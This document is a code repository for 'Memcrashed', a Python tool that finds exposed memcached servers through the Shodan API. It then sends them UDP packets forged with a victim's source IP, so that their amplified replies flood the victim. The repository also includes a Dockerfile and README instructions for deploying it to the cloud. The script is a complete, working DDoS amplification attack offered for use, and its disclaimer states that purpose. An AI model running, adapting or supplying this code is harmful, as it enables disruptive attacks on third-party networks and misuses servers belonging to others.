├── requirements.txt ├── 1.png ├── 2.png ├── 3.png ├── 4.png ├── .gitignore ├── Dockerfile ├── README.md └── Memcrashed.py /requirements.txt: -------------------------------------------------------------------------------- 1 | scapy==2.4.1 2 | shodan==1.7.7 3 | -------------------------------------------------------------------------------- /1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/649/Memcrashed-DDoS-Exploit/HEAD/1.png -------------------------------------------------------------------------------- /2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/649/Memcrashed-DDoS-Exploit/HEAD/2.png -------------------------------------------------------------------------------- /3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/649/Memcrashed-DDoS-Exploit/HEAD/3.png -------------------------------------------------------------------------------- /4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/649/Memcrashed-DDoS-Exploit/HEAD/4.png -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | *.pyc 2 | *.png 3 | *.swp 4 | api.txt 5 | bots.txt 6 | venv/* 7 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM alpine:latest 2 | 3 | RUN apk add --update python3 py3-pip git tcpdump 4 | 5 | RUN git clone https://github.com/649/Memcrashed-DDoS-Exploit.git Memcrashed 6 | WORKDIR Memcrashed 7 | # COPY requirements.txt . 8 | # COPY api.txt . 9 | # COPY bots.txt . 10 | RUN pip3 install -r requirements.txt 11 | 12 | ENTRYPOINT ["python3", "Memcrashed.py"] 13 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # MEMCRASHED DDOS EXPLOIT TOOL 2 | 3 | * Author: [@037](https://twitter.com/037) 4 | 5 | This tool allows you to send forged UDP packets to Memcached servers obtained from Shodan.io 6 | 7 | ### Prerequisites 8 | 9 | The only thing you need installed is Python 3.x 10 | 11 | ``` 12 | apt-get install python3 13 | ``` 14 | 15 | You also require to have Scapy and Shodan modules installed 16 | ``` 17 | pip install scapy 18 | ``` 19 | 20 | ``` 21 | pip install shodan 22 | ``` 23 | 24 | ### Using Shodan API 25 | 26 | This tool requires you to own an upgraded Shodan API 27 | 28 | You may obtain one for free in [Shodan](https://shodan.io/) if you sign up using a .edu email 29 | 30 | ![alt text](https://raw.githubusercontent.com/649/Memcrashed-DDoS-Exploit/master/2.png) 31 | ![alt text](https://raw.githubusercontent.com/649/Memcrashed-DDoS-Exploit/master/1.png) 32 | ![alt text](https://raw.githubusercontent.com/649/Memcrashed-DDoS-Exploit/master/3.png) 33 | ![alt text](https://raw.githubusercontent.com/649/Memcrashed-DDoS-Exploit/master/4.png) 34 | 35 | 36 | ### Using Docker 37 | 38 | ##### [Demo](https://asciinema.org/a/v1AEEa17xzqUfyW4pEIS0JONW) 39 | 40 | You may deploy this tool to the cloud using a light Alpine Docker image. 41 | 42 | > Note: Make sure to explicitly enter 'y' or 'n' to the interactive prompt 43 | 44 | ```bash 45 | git clone https://github.com/649/Memcrashed-DDoS-Exploit.git 46 | cd Memcrashed-DDoS-Exploit 47 | echo "SHODAN_KEY" > api.txt 48 | docker build -t memcrashed . 49 | docker run -it memcrashed 50 | 51 | ``` 52 | 53 | -------------------------------------------------------------------------------- /Memcrashed.py: -------------------------------------------------------------------------------- 1 | #-- coding: utf8 -- 2 | #!/usr/bin/env python3 3 | import sys, os, time, shodan 4 | from pathlib import Path 5 | from scapy.all import * 6 | from contextlib import contextmanager, redirect_stdout 7 | 8 | starttime = time.time() 9 | 10 | @contextmanager 11 | def suppress_stdout(): 12 | with open(os.devnull, "w") as devnull: 13 | with redirect_stdout(devnull): 14 | yield 15 | 16 | class color: 17 | HEADER = '\033[0m' 18 | 19 | keys = Path("./api.txt") 20 | logo = color.HEADER + ''' 21 | 22 | ███╗ ███╗███████╗███╗ ███╗ ██████╗██████╗ █████╗ ███████╗██╗ ██╗███████╗██████╗ 23 | ████╗ ████║██╔════╝████╗ ████║██╔════╝██╔══██╗██╔══██╗██╔════╝██║ ██║██╔════╝██╔══██╗ 24 | ██╔████╔██║█████╗ ██╔████╔██║██║ ██████╔╝███████║███████╗███████║█████╗ ██║ ██║ 25 | ██║╚██╔╝██║██╔══╝ ██║╚██╔╝██║██║ ██╔══██╗██╔══██║╚════██║██╔══██║██╔══╝ ██║ ██║ 26 | ██║ ╚═╝ ██║███████╗██║ ╚═╝ ██║╚██████╗██║ ██║██║ ██║███████║██║ ██║███████╗██████╔╝ 27 | ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝╚═════╝ 28 | 29 | Author: @037 30 | Version: 4.0 31 | 32 | ####################################### DISCLAIMER ######################################## 33 | | Memcrashed is a tool that allows you to use Shodan.io to obtain hundreds of vulnerable | 34 | | memcached servers. It then allows you to use the same servers to launch widespread | 35 | | distributed denial of service attacks by forging UDP packets sourced to your victim. | 36 | | Default payload includes the memcached "stats" command, 10 bytes to send, but the reply | 37 | | is between 1,500 bytes up to hundreds of kilobytes. Please use this tool responsibly. | 38 | | I am NOT responsible for any damages caused or any crimes committed by using this tool. | 39 | ########################################################################################### 40 | 41 | ''' 42 | print(logo) 43 | 44 | if keys.is_file(): 45 | with open('api.txt', 'r') as file: 46 | SHODAN_API_KEY=file.readline().rstrip('\n') 47 | else: 48 | file = open('api.txt', 'w') 49 | SHODAN_API_KEY = input('[*] Please enter a valid Shodan.io API Key: ') 50 | file.write(SHODAN_API_KEY) 51 | print('[~] File written: ./api.txt') 52 | file.close() 53 | 54 | while True: 55 | api = shodan.Shodan(SHODAN_API_KEY) 56 | print('') 57 | try: 58 | myresults = Path("./bots.txt") 59 | query = input("[*] Use Shodan API to search for affected Memcached servers? : ").lower() 60 | if query.startswith('y'): 61 | print('') 62 | print('[~] Checking Shodan.io API Key: %s' % SHODAN_API_KEY) 63 | results = api.search('product:"Memcached" port:11211') 64 | print('[✓] API Key Authentication: SUCCESS') 65 | print('[~] Number of bots: %s' % results['total']) 66 | print('') 67 | saveresult = input("[*] Save results for later usage? : ").lower() 68 | if saveresult.startswith('y'): 69 | file2 = open('bots.txt', 'a') 70 | for result in results['matches']: 71 | file2.write(result['ip_str'] + "\n") 72 | print('[~] File written: ./bots.txt') 73 | print('') 74 | file2.close() 75 | saveme = input('[*] Would you like to use locally stored Shodan data? : ').lower() 76 | if myresults.is_file(): 77 | if saveme.startswith('y'): 78 | with open('bots.txt') as my_file: 79 | ip_array = [line.rstrip() for line in my_file] 80 | else: 81 | print('') 82 | print('[✘] Error: No bots stored locally, bots.txt file not found!') 83 | print('') 84 | if saveme.startswith('y') or query.startswith('y'): 85 | print('') 86 | target = input("[▸] Enter target IP address: ") 87 | targetport = input("[▸] Enter target port number (Default 80): ") or "80" 88 | power = int(input("[▸] Enter preferred power (Default 1): ") or "1") 89 | print('') 90 | data = input("[+] Enter payload contained inside packet: ") or "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n" 91 | if (data != "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"): 92 | dataset = "set injected 0 3600 ", len(data)+1, "\r\n", data, "\r\n get injected\r\n" 93 | setdata = ("\x00\x00\x00\x00\x00\x00\x00\x00set\x00injected\x000\x003600\x00%s\r\n%s\r\n" % (len(data)+1, data)) 94 | getdata = ("\x00\x00\x00\x00\x00\x00\x00\x00get\x00injected\r\n") 95 | print("[+] Payload transformed: ", dataset) 96 | print('') 97 | if query.startswith('y'): 98 | iplist = input('[*] Would you like to display all the bots from Shodan? : ').lower() 99 | if iplist.startswith('y'): 100 | print('') 101 | counter= int(0) 102 | for result in results['matches']: 103 | host = api.host('%s' % result['ip_str']) 104 | counter=counter+1 105 | print('[+] Memcache Server (%d) | IP: %s | OS: %s | ISP: %s |' % (counter, result['ip_str'], host.get('os', 'n/a'), host.get('org', 'n/a'))) 106 | time.sleep(1.1 - ((time.time() - starttime) % 1.1)) 107 | if saveme.startswith('y'): 108 | iplistlocal = input('[*] Would you like to display all the bots stored locally? : ').lower() 109 | if iplistlocal.startswith('y'): 110 | print('') 111 | counter= int(0) 112 | for x in ip_array: 113 | host = api.host('%s' % x) 114 | counter=counter+1 115 | print('[+] Memcache Server (%d) | IP: %s | OS: %s | ISP: %s |' % (counter, x, host.get('os', 'n/a'), host.get('org', 'n/a'))) 116 | time.sleep(1.1 - ((time.time() - starttime) % 1.1)) 117 | print('') 118 | engage = input('[*] Ready to engage target %s? : ' % target).lower() 119 | if engage.startswith('y'): 120 | if saveme.startswith('y'): 121 | for i in ip_array: 122 | if (data != "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"): 123 | print('[+] Sending 2 forged synchronized payloads to: %s' % (i)) 124 | with suppress_stdout(): 125 | send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=setdata), count=1) 126 | send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=getdata), count=power) 127 | else: 128 | if power>1: 129 | print('[+] Sending %d forged UDP packets to: %s' % (power, i)) 130 | with suppress_stdout(): 131 | send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=data), count=power) 132 | elif power==1: 133 | print('[+] Sending 1 forged UDP packet to: %s' % i) 134 | with suppress_stdout(): 135 | send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=data), count=power) 136 | else: 137 | for result in results['matches']: 138 | if (data != "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"): 139 | print('[+] Sending 2 forged synchronized payloads to: %s' % (i)) 140 | with suppress_stdout(): 141 | send(IP(src=target, dst='%s' % result['ip_str']) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=setdata), count=1) 142 | send(IP(src=target, dst='%s' % result['ip_str']) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=getdata), count=power) 143 | else: 144 | if power>1: 145 | print('[+] Sending %d forged UDP packets to: %s' % (power, result['ip_str'])) 146 | with suppress_stdout(): 147 | send(IP(src=target, dst='%s' % result['ip_str']) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=data), count=power) 148 | elif power==1: 149 | print('[+] Sending 1 forged UDP packet to: %s' % result['ip_str']) 150 | with suppress_stdout(): 151 | send(IP(src=target, dst='%s' % result['ip_str']) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=data), count=power) 152 | print('') 153 | print('[•] Task complete! Exiting Platform. Have a wonderful day.') 154 | break 155 | else: 156 | print('') 157 | print('[✘] Error: %s not engaged!' % target) 158 | print('[~] Restarting Platform! Please wait.') 159 | print('') 160 | else: 161 | print('') 162 | print('[✘] Error: No bots stored locally or remotely on Shodan!') 163 | print('[~] Restarting Platform! Please wait.') 164 | print('') 165 | 166 | except shodan.APIError as e: 167 | print('[✘] Error: %s' % e) 168 | option = input('[*] Would you like to change API Key? : ').lower() 169 | if option.startswith('y'): 170 | file = open('api.txt', 'w') 171 | SHODAN_API_KEY = input('[*] Please enter valid Shodan.io API Key: ') 172 | file.write(SHODAN_API_KEY) 173 | print('[~] File written: ./api.txt') 174 | file.close() 175 | print('[~] Restarting Platform! Please wait.') 176 | print('') 177 | else: 178 | print('') 179 | print('[•] Exiting Platform. Have a wonderful day.') 180 | break 181 | --------------------------------------------------------------------------------